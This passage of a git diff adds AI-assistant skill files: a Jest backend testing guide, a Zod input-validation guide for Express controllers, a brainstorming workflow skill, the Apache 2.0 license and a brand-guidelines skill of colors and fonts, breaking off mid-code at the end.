      expect(userRepository.emailExists).toHaveBeenCalledWith(userData.email);
      expect(userRepository.create).toHaveBeenCalled();
    });

    it('should throw ConflictError when email exists', async () => {
      // Arrange
      const userData = {
        email: 'existing@example.com',
        name: 'Test User',
        roles: ['user'],
      };

      (userRepository.emailExists as jest.Mock).mockResolvedValue(true);

      // Act & Assert
      await expect(userService.createUser(userData)).rejects.toThrow(ConflictError);
      expect(userRepository.create).not.toHaveBeenCalled();
    });
  });
});
```

---

**Related Files:**
- [SKILL.md](SKILL.md) - Main guide
- [routing-and-controllers.md](routing-and-controllers.md) - Controllers that use services
- [database-patterns.md](database-patterns.md) - Prisma and repository patterns
- [complete-examples.md](complete-examples.md) - Full service/repository examples
235	skills/backend-dev-guidelines/resources/testing-guide.md	Normal file
@@ -0,0 +1,235 @@
# Testing Guide - Backend Testing Strategies

Complete guide to testing backend services with Jest and best practices.

## Table of Contents

- [Unit Testing](#unit-testing)
- [Integration Testing](#integration-testing)
- [Mocking Strategies](#mocking-strategies)
- [Test Data Management](#test-data-management)
- [Testing Authenticated Routes](#testing-authenticated-routes)
- [Coverage Targets](#coverage-targets)

---

## Unit Testing

### Test Structure

```typescript
// services/userService.test.ts
import { UserService } from './userService';
import { UserRepository } from '../repositories/UserRepository';

jest.mock('../repositories/UserRepository');

describe('UserService', () => {
  let service: UserService;
  let mockRepository: jest.Mocked<UserRepository>;

  beforeEach(() => {
    mockRepository = {
      findByEmail: jest.fn(),
      create: jest.fn(),
    } as any;

    service = new UserService();
    (service as any).userRepository = mockRepository;
  });

  afterEach(() => {
    jest.clearAllMocks();
  });

  describe('create', () => {
    it('should throw error if email exists', async () => {
      mockRepository.findByEmail.mockResolvedValue({ id: '123' } as any);

      await expect(
        service.create({ email: 'test@test.com' })
      ).rejects.toThrow('Email already in use');
    });

    it('should create user if email is unique', async () => {
      mockRepository.findByEmail.mockResolvedValue(null);
      mockRepository.create.mockResolvedValue({ id: '123' } as any);

      const user = await service.create({
        email: 'test@test.com',
        firstName: 'John',
        lastName: 'Doe',
      });

      expect(user).toBeDefined();
      expect(mockRepository.create).toHaveBeenCalledWith(
        expect.objectContaining({
          email: 'test@test.com'
        })
      );
    });
  });
});
```

---

## Integration Testing

### Test with Real Database

```typescript
import { PrismaService } from '@project-lifecycle-portal/database';
import { userService } from '../services/userService';

describe('UserService Integration', () => {
  let testUser: any;

  beforeAll(async () => {
    // Create test data
    testUser = await PrismaService.main.user.create({
      data: {
        email: 'test@test.com',
        profile: { create: { firstName: 'Test', lastName: 'User' } },
      },
    });
  });

  afterAll(async () => {
    // Cleanup
    await PrismaService.main.user.delete({ where: { id: testUser.id } });
  });

  it('should find user by email', async () => {
    const user = await userService.findByEmail('test@test.com');
    expect(user).toBeDefined();
    expect(user?.email).toBe('test@test.com');
  });
});
```

---

## Mocking Strategies

### Mock PrismaService

```typescript
jest.mock('@project-lifecycle-portal/database', () => ({
  PrismaService: {
    main: {
      user: {
        findMany: jest.fn(),
        findUnique: jest.fn(),
        create: jest.fn(),
        update: jest.fn(),
      },
    },
    isAvailable: true,
  },
}));
```

### Mock Services

```typescript
const mockUserService = {
  findById: jest.fn(),
  create: jest.fn(),
  update: jest.fn(),
} as unknown as jest.Mocked<UserService>;
```

---

## Test Data Management

### Setup and Teardown

```typescript
describe('PermissionService', () => {
  let instanceId: number;

  beforeAll(async () => {
    // Create test post
    const post = await PrismaService.main.post.create({
      data: { title: 'Test Post', content: 'Test', authorId: 'test-user' },
    });
    instanceId = post.id;
  });

  afterAll(async () => {
    // Cleanup
    await PrismaService.main.post.delete({
      where: { id: instanceId },
    });
  });

  beforeEach(() => {
    // Clear caches
    permissionService.clearCache();
  });

  it('should check permissions', async () => {
    const hasPermission = await permissionService.checkPermission(
      'user-id',
      instanceId,
      'VIEW_WORKFLOW'
    );
    expect(hasPermission).toBeDefined();
  });
});
```

---

## Testing Authenticated Routes

### Using test-auth-route.js

```bash
# Test authenticated endpoint
node scripts/test-auth-route.js http://localhost:3002/form/api/users

# Test with POST data
node scripts/test-auth-route.js http://localhost:3002/form/api/users POST '{"email":"test@test.com"}'
```

### Mock Authentication in Tests

```typescript
// Mock auth middleware
jest.mock('../middleware/SSOMiddleware', () => ({
  SSOMiddlewareClient: {
    verifyLoginStatus: (req, res, next) => {
      res.locals.claims = {
        sub: 'test-user-id',
        preferred_username: 'testuser',
      };
      next();
    },
  },
}));
```

---

## Coverage Targets

### Recommended Coverage

- **Unit Tests**: 70%+ coverage
- **Integration Tests**: Critical paths covered
- **E2E Tests**: Happy paths covered

### Run Coverage

```bash
npm test -- --coverage
```
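To enforce the 70% unit-test floor rather than just report it, Jest can fail the coverage run when a threshold is not met. A sketch of the config (threshold values mirror the target above and are adjustable per project; this file is not part of the codebase excerpts):

```typescript
// jest.config.ts (illustrative - unmet thresholds fail `npm test -- --coverage`)
export default {
  collectCoverage: true,
  coverageThreshold: {
    global: {
      statements: 70,
      branches: 70,
      functions: 70,
      lines: 70,
    },
  },
};
```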

---

**Related Files:**
- [SKILL.md](SKILL.md)
- [services-and-repositories.md](services-and-repositories.md)
- [complete-examples.md](complete-examples.md)
754	skills/backend-dev-guidelines/resources/validation-patterns.md	Normal file
@@ -0,0 +1,754 @@
# Validation Patterns - Input Validation with Zod

Complete guide to input validation using Zod schemas for type-safe validation.

## Table of Contents

- [Why Zod?](#why-zod)
- [Basic Zod Patterns](#basic-zod-patterns)
- [Schema Examples from Codebase](#schema-examples-from-codebase)
- [Route-Level Validation](#route-level-validation)
- [Controller Validation](#controller-validation)
- [DTO Pattern](#dto-pattern)
- [Error Handling](#error-handling)
- [Advanced Patterns](#advanced-patterns)

---

## Why Zod?

### Benefits Over Joi/Other Libraries

**Type Safety:**
- ✅ Full TypeScript inference
- ✅ Runtime + compile-time validation
- ✅ Automatic type generation

**Developer Experience:**
- ✅ Intuitive API
- ✅ Composable schemas
- ✅ Excellent error messages

**Performance:**
- ✅ Fast validation
- ✅ Small bundle size
- ✅ Tree-shakeable

### Migration from Joi

Modern validation uses Zod instead of Joi:

```typescript
// ❌ OLD - Joi (being phased out)
const schema = Joi.object({
  email: Joi.string().email().required(),
  name: Joi.string().min(3).required(),
});

// ✅ NEW - Zod (preferred)
const schema = z.object({
  email: z.string().email(),
  name: z.string().min(3),
});
```

---

## Basic Zod Patterns

### Primitive Types

```typescript
import { z } from 'zod';

// Strings
const nameSchema = z.string();
const emailSchema = z.string().email();
const urlSchema = z.string().url();
const uuidSchema = z.string().uuid();
const minLengthSchema = z.string().min(3);
const maxLengthSchema = z.string().max(100);

// Numbers
const ageSchema = z.number().int().positive();
const priceSchema = z.number().positive();
const rangeSchema = z.number().min(0).max(100);

// Booleans
const activeSchema = z.boolean();

// Dates
const dateSchema = z.string().datetime(); // ISO 8601 string
const nativeDateSchema = z.date(); // Native Date object

// Enums
const roleSchema = z.enum(['admin', 'operations', 'user']);
const statusSchema = z.enum(['PENDING', 'APPROVED', 'REJECTED']);
```

### Objects

```typescript
// Simple object
const userSchema = z.object({
  email: z.string().email(),
  name: z.string(),
  age: z.number().int().positive(),
});

// Nested objects
const addressSchema = z.object({
  street: z.string(),
  city: z.string(),
  zipCode: z.string().regex(/^\d{5}$/),
});

const userWithAddressSchema = z.object({
  name: z.string(),
  address: addressSchema,
});

// Optional fields
const userWithOptionalsSchema = z.object({
  name: z.string(),
  email: z.string().email().optional(),
  phone: z.string().optional(),
});

// Nullable fields
const userWithNullableSchema = z.object({
  name: z.string(),
  middleName: z.string().nullable(),
});
```

### Arrays

```typescript
// Array of primitives
const rolesSchema = z.array(z.string());
const numbersSchema = z.array(z.number());

// Array of objects
const usersSchema = z.array(
  z.object({
    id: z.string(),
    name: z.string(),
  })
);

// Array with constraints
const tagsSchema = z.array(z.string()).min(1).max(10);
const nonEmptyArray = z.array(z.string()).nonempty();
```

---

## Schema Examples from Codebase

### Form Validation Schemas

**File:** `/form/src/helpers/zodSchemas.ts`

```typescript
import { z } from 'zod';

// Question types enum
export const questionTypeSchema = z.enum([
  'input',
  'textbox',
  'editor',
  'dropdown',
  'autocomplete',
  'checkbox',
  'radio',
  'upload',
]);

// Upload types
export const uploadTypeSchema = z.array(
  z.enum(['pdf', 'image', 'excel', 'video', 'powerpoint', 'word']).nullable()
);

// Input types
export const inputTypeSchema = z
  .enum(['date', 'number', 'input', 'currency'])
  .nullable();

// Question option
export const questionOptionSchema = z.object({
  id: z.number().int().positive().optional(),
  controlTag: z.string().max(150).nullable().optional(),
  label: z.string().max(100).nullable().optional(),
  order: z.number().int().min(0).default(0),
});

// Question schema
export const questionSchema = z.object({
  id: z.number().int().positive().optional(),
  formID: z.number().int().positive(),
  sectionID: z.number().int().positive().optional(),
  options: z.array(questionOptionSchema).optional(),
  label: z.string().max(500),
  description: z.string().max(5000).optional(),
  type: questionTypeSchema,
  uploadTypes: uploadTypeSchema.optional(),
  inputType: inputTypeSchema.optional(),
  tags: z.array(z.string().max(150)).optional(),
  required: z.boolean(),
  isStandard: z.boolean().optional(),
  deprecatedKey: z.string().nullable().optional(),
  maxLength: z.number().int().positive().nullable().optional(),
  isOptionsSorted: z.boolean().optional(),
});

// Form section schema
export const formSectionSchema = z.object({
  id: z.number().int().positive(),
  formID: z.number().int().positive(),
  questions: z.array(questionSchema).optional(),
  label: z.string().max(500),
  description: z.string().max(5000).optional(),
  isStandard: z.boolean(),
});

// Create form schema
export const createFormSchema = z.object({
  id: z.number().int().positive(),
  label: z.string().max(150),
  description: z.string().max(6000).nullable().optional(),
  isPhase: z.boolean().optional(),
  username: z.string(),
});

// Update order schema
export const updateOrderSchema = z.object({
  source: z.object({
    index: z.number().int().min(0),
    sectionID: z.number().int().min(0),
  }),
  destination: z.object({
    index: z.number().int().min(0),
    sectionID: z.number().int().min(0),
  }),
});

// Controller-specific validation schemas
export const createQuestionValidationSchema = z.object({
  formID: z.number().int().positive(),
  sectionID: z.number().int().positive(),
  question: questionSchema,
  index: z.number().int().min(0).nullable().optional(),
  username: z.string(),
});

export const updateQuestionValidationSchema = z.object({
  questionID: z.number().int().positive(),
  username: z.string(),
  question: questionSchema,
});
```
### Proxy Relationship Schema

```typescript
// Proxy relationship validation
const createProxySchema = z.object({
  originalUserID: z.string().min(1),
  proxyUserID: z.string().min(1),
  startsAt: z.string().datetime(),
  expiresAt: z.string().datetime(),
});

// With custom validation
const createProxySchemaWithValidation = createProxySchema.refine(
  (data) => new Date(data.expiresAt) > new Date(data.startsAt),
  {
    message: 'expiresAt must be after startsAt',
    path: ['expiresAt'],
  }
);
```
|
||||||
|
|
||||||
|
### Workflow Validation

```typescript
// Workflow start schema
const startWorkflowSchema = z.object({
  workflowCode: z.string().min(1),
  entityType: z.enum(['Post', 'User', 'Comment']),
  entityID: z.number().int().positive(),
  dryRun: z.boolean().optional().default(false),
});

// Workflow step completion schema
const completeStepSchema = z.object({
  stepInstanceID: z.number().int().positive(),
  answers: z.record(z.string(), z.any()),
  dryRun: z.boolean().optional().default(false),
});
```

---

## Route-Level Validation

### Pattern 1: Inline Validation

```typescript
// routes/proxyRoutes.ts
import { z } from 'zod';

const createProxySchema = z.object({
  originalUserID: z.string().min(1),
  proxyUserID: z.string().min(1),
  startsAt: z.string().datetime(),
  expiresAt: z.string().datetime(),
});

router.post(
  '/',
  SSOMiddlewareClient.verifyLoginStatus,
  async (req, res) => {
    try {
      // Validate at route level
      const validated = createProxySchema.parse(req.body);

      // Delegate to service
      const proxy = await proxyService.createProxyRelationship(validated);

      res.status(201).json({ success: true, data: proxy });
    } catch (error) {
      if (error instanceof z.ZodError) {
        return res.status(400).json({
          success: false,
          error: {
            message: 'Validation failed',
            details: error.errors,
          },
        });
      }
      handler.handleException(res, error);
    }
  }
);
```

**Pros:**
- Quick and simple
- Good for simple routes

**Cons:**
- Validation logic lives in routes
- Harder to test
- Not reusable

---

## Controller Validation

### Pattern 2: Controller Validation (Recommended)

```typescript
// validators/userSchemas.ts
import { z } from 'zod';

export const createUserSchema = z.object({
  email: z.string().email(),
  name: z.string().min(2).max(100),
  roles: z.array(z.enum(['admin', 'operations', 'user'])),
  isActive: z.boolean().default(true),
});

export const updateUserSchema = z.object({
  email: z.string().email().optional(),
  name: z.string().min(2).max(100).optional(),
  roles: z.array(z.enum(['admin', 'operations', 'user'])).optional(),
  isActive: z.boolean().optional(),
});

export type CreateUserDTO = z.infer<typeof createUserSchema>;
export type UpdateUserDTO = z.infer<typeof updateUserSchema>;
```

```typescript
// controllers/UserController.ts
import { Request, Response } from 'express';
import { BaseController } from './BaseController';
import { UserService } from '../services/userService';
import { createUserSchema, updateUserSchema } from '../validators/userSchemas';
import { z } from 'zod';

export class UserController extends BaseController {
  private userService: UserService;

  constructor() {
    super();
    this.userService = new UserService();
  }

  async createUser(req: Request, res: Response): Promise<void> {
    try {
      // Validate input
      const validated = createUserSchema.parse(req.body);

      // Call service
      const user = await this.userService.createUser(validated);

      this.handleSuccess(res, user, 'User created successfully', 201);
    } catch (error) {
      if (error instanceof z.ZodError) {
        // Handle validation errors with 400 status
        return this.handleError(error, res, 'createUser', 400);
      }
      this.handleError(error, res, 'createUser');
    }
  }

  async updateUser(req: Request, res: Response): Promise<void> {
    try {
      // Validate params and body
      const userId = req.params.id;
      const validated = updateUserSchema.parse(req.body);

      const user = await this.userService.updateUser(userId, validated);

      this.handleSuccess(res, user, 'User updated successfully');
    } catch (error) {
      if (error instanceof z.ZodError) {
        return this.handleError(error, res, 'updateUser', 400);
      }
      this.handleError(error, res, 'updateUser');
    }
  }
}
```

**Pros:**
- Clean separation
- Reusable schemas
- Easy to test
- Type-safe DTOs

**Cons:**
- More files to manage

---

## DTO Pattern

### Type Inference from Schemas

```typescript
import { z } from 'zod';

// Define schema
const createUserSchema = z.object({
  email: z.string().email(),
  name: z.string(),
  age: z.number().int().positive(),
});

// Infer TypeScript type from schema
type CreateUserDTO = z.infer<typeof createUserSchema>;

// Equivalent to:
// type CreateUserDTO = {
//   email: string;
//   name: string;
//   age: number;
// }

// Use in service
class UserService {
  async createUser(data: CreateUserDTO): Promise<User> {
    // data is fully typed!
    console.log(data.email);   // ✅ TypeScript knows this exists
    console.log(data.invalid); // ❌ TypeScript error!
  }
}
```

### Input vs Output Types

```typescript
// Input schema (what API receives)
const createUserInputSchema = z.object({
  email: z.string().email(),
  name: z.string(),
  password: z.string().min(8),
});

// Output schema (what API returns)
const userOutputSchema = z.object({
  id: z.string().uuid(),
  email: z.string().email(),
  name: z.string(),
  createdAt: z.string().datetime(),
  // password excluded!
});

type CreateUserInput = z.infer<typeof createUserInputSchema>;
type UserOutput = z.infer<typeof userOutputSchema>;
```

---

## Error Handling

### Zod Error Format

```typescript
try {
  const validated = schema.parse(data);
} catch (error) {
  if (error instanceof z.ZodError) {
    console.log(error.errors);
    // [
    //   {
    //     code: 'invalid_type',
    //     expected: 'string',
    //     received: 'number',
    //     path: ['email'],
    //     message: 'Expected string, received number'
    //   }
    // ]
  }
}
```

### Custom Error Messages

```typescript
const userSchema = z.object({
  email: z.string().email({ message: 'Please provide a valid email address' }),
  name: z.string().min(2, { message: 'Name must be at least 2 characters' }),
  age: z.number().int().positive({ message: 'Age must be a positive number' }),
});
```

### Formatted Error Response

```typescript
// Helper function to format Zod errors
function formatZodError(error: z.ZodError) {
  return {
    message: 'Validation failed',
    errors: error.errors.map((err) => ({
      field: err.path.join('.'),
      message: err.message,
      code: err.code,
    })),
  };
}

// In controller
catch (error) {
  if (error instanceof z.ZodError) {
    return res.status(400).json({
      success: false,
      error: formatZodError(error),
    });
  }
}

// Response example:
// {
//   "success": false,
//   "error": {
//     "message": "Validation failed",
//     "errors": [
//       {
//         "field": "email",
//         "message": "Invalid email",
//         "code": "invalid_string"
//       }
//     ]
//   }
// }
```

---

## Advanced Patterns

### Conditional Validation

```typescript
// Validate based on other field values
const submissionSchema = z.object({
  type: z.enum(['NEW', 'UPDATE']),
  postId: z.number().optional(),
}).refine(
  (data) => {
    // If type is UPDATE, postId is required
    if (data.type === 'UPDATE') {
      return data.postId !== undefined;
    }
    return true;
  },
  {
    message: 'postId is required when type is UPDATE',
    path: ['postId'],
  }
);
```

### Transform Data

```typescript
// Transform strings to numbers
const userSchema = z.object({
  name: z.string(),
  age: z.string().transform((val) => parseInt(val, 10)),
});

// Transform dates
const eventSchema = z.object({
  name: z.string(),
  date: z.string().transform((str) => new Date(str)),
});
```

### Preprocess Data

```typescript
// Trim strings before validation
const userSchema = z.object({
  email: z.preprocess(
    (val) => typeof val === 'string' ? val.trim().toLowerCase() : val,
    z.string().email()
  ),
  name: z.preprocess(
    (val) => typeof val === 'string' ? val.trim() : val,
    z.string().min(2)
  ),
});
```

### Union Types

```typescript
// Multiple possible types
const idSchema = z.union([z.string(), z.number()]);

// Discriminated unions
const notificationSchema = z.discriminatedUnion('type', [
  z.object({
    type: z.literal('email'),
    recipient: z.string().email(),
    subject: z.string(),
  }),
  z.object({
    type: z.literal('sms'),
    phoneNumber: z.string(),
    message: z.string(),
  }),
]);
```

### Recursive Schemas

```typescript
// For nested structures like trees
type Category = {
  id: number;
  name: string;
  children?: Category[];
};

const categorySchema: z.ZodType<Category> = z.lazy(() =>
  z.object({
    id: z.number(),
    name: z.string(),
    children: z.array(categorySchema).optional(),
  })
);
```

### Schema Composition

```typescript
// Base schemas
const timestampsSchema = z.object({
  createdAt: z.string().datetime(),
  updatedAt: z.string().datetime(),
});

const auditSchema = z.object({
  createdBy: z.string(),
  updatedBy: z.string(),
});

// Compose schemas
const userSchema = z.object({
  id: z.string(),
  email: z.string().email(),
  name: z.string(),
}).merge(timestampsSchema).merge(auditSchema);

// Extend schemas
const adminUserSchema = userSchema.extend({
  adminLevel: z.number().int().min(1).max(5),
  permissions: z.array(z.string()),
});

// Pick specific fields
const publicUserSchema = userSchema.pick({
  id: true,
  name: true,
  // email excluded
});

// Omit fields
const userWithoutTimestamps = userSchema.omit({
  createdAt: true,
  updatedAt: true,
});
```

### Validation Middleware

```typescript
// Create reusable validation middleware
import { Request, Response, NextFunction } from 'express';
import { z } from 'zod';

export function validateBody<T extends z.ZodType>(schema: T) {
  return (req: Request, res: Response, next: NextFunction) => {
    try {
      req.body = schema.parse(req.body);
      next();
    } catch (error) {
      if (error instanceof z.ZodError) {
        return res.status(400).json({
          success: false,
          error: {
            message: 'Validation failed',
            details: error.errors,
          },
        });
      }
      next(error);
    }
  };
}

// Usage
router.post('/users',
  validateBody(createUserSchema),
  async (req, res) => {
    // req.body is validated and typed!
    const user = await userService.createUser(req.body);
    res.json({ success: true, data: user });
  }
);
```

---

**Related Files:**
- [SKILL.md](SKILL.md) - Main guide
- [routing-and-controllers.md](routing-and-controllers.md) - Using validation in controllers
- [services-and-repositories.md](services-and-repositories.md) - Using DTOs in services
- [async-and-errors.md](async-and-errors.md) - Error handling patterns
54
skills/brainstorming/SKILL.md
Normal file
@@ -0,0 +1,54 @@
---
name: brainstorming
description: "You MUST use this before any creative work - creating features, building components, adding functionality, or modifying behavior. Explores user intent, requirements and design before implementation."
---

# Brainstorming Ideas Into Designs

## Overview

Help turn ideas into fully formed designs and specs through natural collaborative dialogue.

Start by understanding the current project context, then ask questions one at a time to refine the idea. Once you understand what you're building, present the design in small sections (200-300 words), checking after each section whether it looks right so far.

## The Process

**Understanding the idea:**
- Check out the current project state first (files, docs, recent commits)
- Ask questions one at a time to refine the idea
- Prefer multiple choice questions when possible, but open-ended is fine too
- Only one question per message - if a topic needs more exploration, break it into multiple questions
- Focus on understanding: purpose, constraints, success criteria

**Exploring approaches:**
- Propose 2-3 different approaches with trade-offs
- Present options conversationally, leading with your recommendation and the reasoning behind it

**Presenting the design:**
- Once you believe you understand what you're building, present the design
- Break it into sections of 200-300 words
- Ask after each section whether it looks right so far
- Cover: architecture, components, data flow, error handling, testing
- Be ready to go back and clarify if something doesn't make sense

## After the Design

**Documentation:**
- Write the validated design to `docs/plans/YYYY-MM-DD-<topic>-design.md`
- Use the elements-of-style:writing-clearly-and-concisely skill if available
- Commit the design document to git

**Implementation (if continuing):**
- Ask: "Ready to set up for implementation?"
- Use superpowers:using-git-worktrees to create an isolated workspace
- Use superpowers:writing-plans to create a detailed implementation plan

## Key Principles

- **One question at a time** - Don't overwhelm with multiple questions
- **Multiple choice preferred** - Easier to answer than open-ended when possible
- **YAGNI ruthlessly** - Remove unnecessary features from all designs
- **Explore alternatives** - Always propose 2-3 approaches before settling
- **Incremental validation** - Present design in sections, validate each
- **Be flexible** - Go back and clarify when something doesn't make sense
202
skills/brand-guidelines/LICENSE.txt
Normal file
@@ -0,0 +1,202 @@

                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/

   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION

   1. Definitions.

      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.

      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.

      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.

      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.

      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.

      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.

      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).

      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.

      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."

      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by Licensor and
      subsequently incorporated within the Work.

   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.

   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.

   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:

      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and

      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and

      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and

      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding those notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.

      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.

   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.

   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.

   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.

   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.

   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.

   END OF TERMS AND CONDITIONS

   APPENDIX: How to apply the Apache License to your work.

      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!) The text should be enclosed in the appropriate
      comment syntax for the file format. We also recommend that a
      file or class name and description of purpose be included on the
      same "printed page" as the copyright notice for easier
      identification within third-party archives.

   Copyright [yyyy] [name of copyright owner]

   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at

       http://www.apache.org/licenses/LICENSE-2.0

   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
73
skills/brand-guidelines/SKILL.md
Normal file
@@ -0,0 +1,73 @@
---
name: brand-guidelines
description: Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. Use it when brand colors or style guidelines, visual formatting, or company design standards apply.
license: Complete terms in LICENSE.txt
---

# Anthropic Brand Styling

## Overview

Use this skill to access Anthropic's official brand identity and style resources.

**Keywords**: branding, corporate identity, visual identity, post-processing, styling, brand colors, typography, Anthropic brand, visual formatting, visual design

## Brand Guidelines

### Colors

**Main Colors:**

- Dark: `#141413` - Primary text and dark backgrounds
- Light: `#faf9f5` - Light backgrounds and text on dark
- Mid Gray: `#b0aea5` - Secondary elements
- Light Gray: `#e8e6dc` - Subtle backgrounds

**Accent Colors:**

- Orange: `#d97757` - Primary accent
- Blue: `#6a9bcc` - Secondary accent
- Green: `#788c5d` - Tertiary accent

### Typography

- **Headings**: Poppins (with Arial fallback)
- **Body Text**: Lora (with Georgia fallback)
- **Note**: Fonts should be pre-installed in your environment for best results

## Features

### Smart Font Application

- Applies Poppins font to headings (24pt and larger)
- Applies Lora font to body text
- Automatically falls back to Arial/Georgia if custom fonts are unavailable
- Preserves readability across all systems

### Text Styling

- Headings (24pt+): Poppins font
- Body text: Lora font
- Smart color selection based on background
- Preserves text hierarchy and formatting

### Shape and Accent Colors

- Non-text shapes use accent colors
- Cycles through orange, blue, and green accents
- Maintains visual interest while staying on-brand

## Technical Details

### Font Management

- Uses system-installed Poppins and Lora fonts when available
- Provides automatic fallback to Arial (headings) and Georgia (body)
- No font installation required - works with existing system fonts
- For best results, pre-install Poppins and Lora fonts in your environment

### Color Application

- Uses RGB color values for precise brand matching
- Applied via python-pptx's RGBColor class
- Maintains color fidelity across different systems
|
||||||
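The "smart color selection based on background" behavior above can be sketched as a simple luminance test over the brand palette. This is a hypothetical illustration, not the skill's actual implementation; the 0.5 threshold and the function names are assumptions.

```python
# Hypothetical sketch of "smart color selection": pick the brand text
# color (Dark or Light) that contrasts better with a given background.
# Threshold and names are illustrative, not from the skill itself.

DARK = "#141413"   # primary text / dark backgrounds
LIGHT = "#faf9f5"  # light backgrounds / text on dark

def _luminance(hex_color: str) -> float:
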